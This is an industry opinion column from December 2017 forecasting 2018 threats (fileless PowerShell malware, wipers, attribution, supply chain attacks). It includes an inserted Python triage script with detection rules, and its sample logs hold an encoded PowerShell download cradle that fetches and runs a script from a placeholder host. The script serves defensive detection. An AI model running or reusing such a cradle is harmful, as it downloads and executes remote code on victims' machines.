



More cybersecurity drama, but some hope for defenders in 2018

Dec 21, 2017 | 6 mins
Data Breach, Hacking, Malware

From fileless malware attacks to attack attribution becoming more complex, 2018 won't offer less security drama. But there's still good reason for security professionals to be optimistic about next year.

Cybersecurity dominated the news cycle in 2017. Every few weeks there were headlines about ransomware, leaks of spy tools from U.S. intelligence agencies and breaches at major companies.

While no one expects 2018 to offer less security drama, there’s good reason for security professionals to be optimistic about the months ahead. Here’s my take on what the year ahead holds for the security community based on my conversations with security executives and analysts.

Fileless malware attacks become ubiquitous

Fileless malware is malicious code that exists in memory and not on the target’s hard drive. The code is injected into a running process, such as explorer.exe, and then used for the exploit. Instead of using malware to deliver a malicious payload, adversaries use PowerShell, Windows Management Instrumentation and other administration tools built into Windows.

Attackers are drawn to fileless malware attacks because they leverage tools that are native to Windows, which makes them both effective and stealthy: most security programs can’t distinguish malicious use of PowerShell and WMI from legitimate administration. And since there’s no malware signature for antivirus software to detect (remember, there’s no payload file written to the system), those programs are ineffective at flagging these attacks.

Adversaries are also turning to fileless malware attacks since there are numerous readily-available tools and ready-to-use scripts that make creating PowerShell payloads particularly easy (think Empire, Metasploit, Cobalt Strike and PowerSploit). To be clear, these tools aren’t malicious by nature. Adversaries are abusing them to quickly create PowerShell payloads and evade detection.
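The gap described above is a visibility gap rather than a signature gap, so the practical countermeasure is logging what PowerShell actually executes and triaging it. The following is an added example, not code from the column or from Cybereason: a small triage routine run over constructed log lines loosely modelled on PowerShell script block logging, which decodes -EncodedCommand payloads (UTF-16LE in base64) and applies a handful of well-known heuristics (encoded commands, hidden windows, download cradles, WMI process creation). The log field layout and the rule names are this example's own assumptions.

```python
import base64
import re

# Heuristic rules commonly found in defender rule sets for PowerShell abuse.
# Names and regexes are this example's own choices, not a product's rules.
RULES = {
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"(?:IEX|Invoke-Expression).*(?:DownloadString|DownloadFile|WebClient)", re.I),
    "wmi_process_create": re.compile(r"Win32_Process.*\bCreate\b", re.I),
}

# Constructed sample data: the encoded blob wraps a classic download cradle so
# that the detector has to decode before any rule can fire on it.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')".encode("utf-16le")
).decode()
SAMPLE_LOGS = [
    "2017-12-21T10:02:11Z host=WS01 user=alice ScriptBlockText=Get-Service -Name Spooler | Restart-Service",
    "2017-12-21T10:05:43Z host=WS01 user=alice ScriptBlockText=powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED,
    "2017-12-21T10:07:15Z host=WS03 user=svc ScriptBlockText=Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'notepad.exe'",
]

def decode_encoded_command(text):
    """Return the UTF-16LE payload behind an -EncodedCommand argument, or None."""
    m = RULES["encoded_command"].search(text)
    if not m:
        return None
    blob = m.group(0).split()[-1]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not really base64/UTF-16: leave it to the other rules

def analyze(line):
    """Return (set of triggered rule names, decoded payload or None) for one log line."""
    hits = {name for name, rx in RULES.items() if rx.search(line)}
    decoded = decode_encoded_command(line)
    if decoded:  # re-run every rule on the decoded script, where the real intent lives
        hits |= {name for name, rx in RULES.items() if rx.search(decoded)}
    return hits, decoded

def triage(lines):
    """Return [(host, user, sorted rule hits)] for the lines that trigger any rule."""
    out = []
    for line in lines:
        header = line.split(" ScriptBlockText=")[0]
        fields = dict(re.findall(r"(\w+)=(\S+)", header))
        hits, _ = analyze(line)
        if hits:
            out.append((fields.get("host"), fields.get("user"), sorted(hits)))
    return out

if __name__ == "__main__":
    for host, user, hits in triage(SAMPLE_LOGS):
        print(f"{host} {user}: {', '.join(hits)}")
```

The benign Get-Service line produces no hits, while the encoded line is flagged for the cradle only because the payload was decoded first; this is exactly the step a signature-based file scanner never gets to take.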

Destructive attacks don’t let up

Destructive attacks (those that wipe out data on computers instead of holding it for ransom) will only get worse. The trend since 2010 has been an increase in attacks that were carried out using relatively simple but capable, destructive malware.

June’s NotPetya attack exemplifies this type of attack. While initial reports classified NotPetya as ransomware, it was later determined that the program’s behavior more closely matched a master boot record wiper, which is a very basic technique. But this very basic attack had a devastating effect that went beyond re-imaging machines and restoring data from backups: companies closed manufacturing plants for weeks, lost quarterly revenue and couldn’t conduct normal business operations.

As more actors become emboldened by the lack of consequences for conducting cyberattacks, we are going to see an increase in destructive attacks next year. Most of them will show a level of sophistication that’s just good enough to get the job done, relying on basic tools to cause severe damage. Ultimately, cheap, dirty and effective methods are all any actor needs, a realization that many are having. Disruption is an especially appealing tactic for nation-states and less sophisticated attackers who care less about profit and more about conveying a message or covering up a hacking operation’s forensic evidence.

Attribution lines blur

Advanced, targeted attacks have traditionally been associated with nation-state players, earning the countries behind these campaigns the moniker APT actors. But in the last few years, the lines have blurred between the attack capabilities of nation-state players and those of lower-level cybercriminal groups. Techniques and tools that were once used by a few APT actors have been adopted by dozens of other threat actors, including freelance groups hired by government agencies and organized criminals.

The commoditization of advanced toolsets (think The Shadow Brokers and Vault 8 leaks, which included the source code for high-end tools allegedly developed by the NSA and the CIA) and the public disclosure of attack techniques (like those released during the Vault 7 leaks) are the reasons behind this development. Smaller actors now have access to the same assets as the big players. When both nation-state actors and more common actors are using the same tools, the security community’s ability to attribute attacks to real-world organizations or military units will be severely hindered in 2018.

Supply chain attacks are the new normal

Several supply chain attacks made headlines in 2017, with CCleaner and M.E.Doc being two that generated a lot of attention. Reports of these attacks are likely to increase in 2018 as new players enter the hacking game and gain capabilities that were once exclusive to APT players.

A supply chain attack aims to damage an organization by targeting less secure elements in the supply network. Exploiting a service provider’s supply chain, data supply chain or traditional manufacturer supply chain has been seen in a litany of major data breaches in recent years. In all of these attacks, the victim is not the ultimate target of the attack, but rather a stepping stone to other networks.

Supply chain attacks are increasing because of their economies of scale. The massive data breaches of late have flooded the underground markets with personally identifiable information, credit card numbers and bank account details. The supply of data now exceeds the demand, bringing down the value of this information. Attack campaigns are operated like a business, and like any business that hopes to stay afloat, each campaign has to yield a profit, with low operational costs and a high ROI.

Supply chain attacks enable hacking at scale: the attackers build a hacking operation that targets one organization, and through it are able to gain an initial foothold and further compromise hundreds and sometimes thousands of organizations. When combined with other automated mechanisms, these operations can be scaled up, which allows many organizations to be compromised at the same time. This powerful shift helps drive the economics in favor of the attacker. Plus, supply chain attacks are the gift that continues to give: as long as they are not revealed, they provide ongoing access to new targets without investing in a new toolset.

2018: the year of the defender

But I don’t want this column to be all doom and gloom. The upshot to cybersecurity dominating the 2017 news cycle is that boards of directors and executives are finally aware that security matters. This means that security leaders may finally have a spot in the C-suite, which could lead to 2018 being the year of the defender…stay tuned.


Lior Div is the CEO and Co-Founder of Cybereason. Before forming Cybereason, he founded cyber-security company Alfa Tech.

Div also served in the Israeli Defense Forces. While in the IDF, Div was part of the Israeli Intelligence Corps, where he led an elite cyber-security team in the Corps' 8200 unit. Div's work in the Corps earned him a Medal of Honor.

He is an expert in hacking operations, forensics, reverse engineering, malware analysis, cryptography and evasion.

The opinions expressed in this blog are those of Lior Div and do not necessarily represent those of IDG Communications, Inc., its parent, subsidiary or affiliated companies.